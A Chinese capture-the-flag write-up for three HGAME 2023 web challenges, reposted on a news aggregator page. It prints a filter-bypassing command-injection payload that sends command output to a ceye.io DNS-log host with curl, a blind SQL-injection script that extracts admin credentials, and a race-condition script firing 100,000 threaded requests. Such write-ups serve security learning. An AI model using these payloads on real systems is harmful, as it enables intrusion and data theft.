最新要闻

广告

手机

iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?

iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?

警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案

警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案

家电

HGAME_2023_WEB_WP_WEEK3

来源:博客园


(资料图片)

Ping to the host

很明显的rce,简单测试一下发现空格,cat,;被办,且执行无回显,空格用${IFS},%09,$IFS$9等等来绕过,我们利用dnslog将执行结果外带出来,这里使用的是http://ceye.io/

由于每次dnslog只能带出一条信息,我们利用sed -n来爆破其它信息

ip=|curl${IFS}http://?????.ceye.io/`ls${IFS}/|sed${IFS}-n${IFS}"1p"`

得到flag文件名为:flag_is_here_haha

flag也被办了,用通配符读取就行了

ip=|curl${IFS}http://?????.ceye.io/`ca""t%09/fla*`

Login To Get My Gift

简单的SQL注入,得到admin账号密码即可得到flag,这里直接给exp:
import requestsflag = ""def attack_post(url):    global flag    r = requests.session()    for i in range(1, 100000):        low = 32        high = 127        mid = (low + high) // 2        while low < high:            payload = f"a"/**/||/**/((ascii(right(left(database(),{i}),1)))<{mid})#"            payload1 = f"a"/**/||/**/((ascii(right(left((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/regexp/**/database()),{i}),1)))<{mid})#"            payload2 = f"a"/**/||/**/((ascii(right(left((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/regexp/**/"User1nf0mAt1on"),{i}),1)))<{mid})#"            payload3 = f"a"/**/||/**/((ascii(right(left((select/**/group_concat(concat_ws(":",UsErN4me,PAssw0rD))/**/from/**/User1nf0mAt1on),{i}),1)))<{mid})#"            # print(payload)            data = {                "username": "testuser",                "password": payload3            }            rp = r.post(url, data=data)            # print(rp.text)            if "Success!" in rp.text:                high = mid            else:                low = mid + 1            mid = (low + high) // 2        if low <= 32 or high >= 127:            break        flag += chr(mid - 1)        print(flag)if __name__ == "__main__":    url = "http://week-3.hgame.lwsec.cn:30369/login"    attack_post(url)

Gopher Shop

下载附件是源码,先对题目环境分析一波,是一个商店的界面,售卖一些商品,其中有FLAG,可以知道肯定需要买到这个FLAG接下来分析源码,找到user.go这个文件,这里面是对销售的一些功能实现,往下可以看到判断是否卖的出这个函数,if判断后,直接对商品数量进行加减,这里猜测可以条件竞争,直接过if买到FLAG,其实正解应该是go的uint溢出,这里应该算非预期了。
import requestsimport threadingheaders = {    "Cookie": "SESSION=MTY3NDU1MjI0MnxEdi1CQkFFQ180SUFBUkFCRUFBQUlfLUNBQUVHYzNSeWFXNW5EQVlBQkhWelpYSUdjM1J5YVc1bkRBY0FCV0ZrYldsdXw23LorOFg5LmryZzZcxm8ESbYpNFaTv1UjY2UkMozyJw==; session=MTY3NDcwNzYyM3xEdi1CQkFFQ180SUFBUkFCRUFBQUpfLUNBQUVHYzNSeWFXNW5EQW9BQ0hWelpYSnVZVzFsQm5OMGNtbHVad3dIQUFWaFpHMXBiZz09fM5a-9HM-2vbFCrfAbfLVU049emtbxCloYDTab3QDEx-"}def get(url):    r = requests.get(url=url, headers=headers)if __name__ == "__main__":    url = "http://week-3.hgame.lwsec.cn:30552/api/v1/user/buyProduct?product=Flag&number=1"    for i in range(100000):        threading.Thread(target=get, args=(url,)).start()

然后界面就直接买到FLAG了,checkFLAG即可拿到flag值:

hgame{GopherShop_M@gic_1nt_0verflow}

关键词: 账号密码 这个文件 使用的是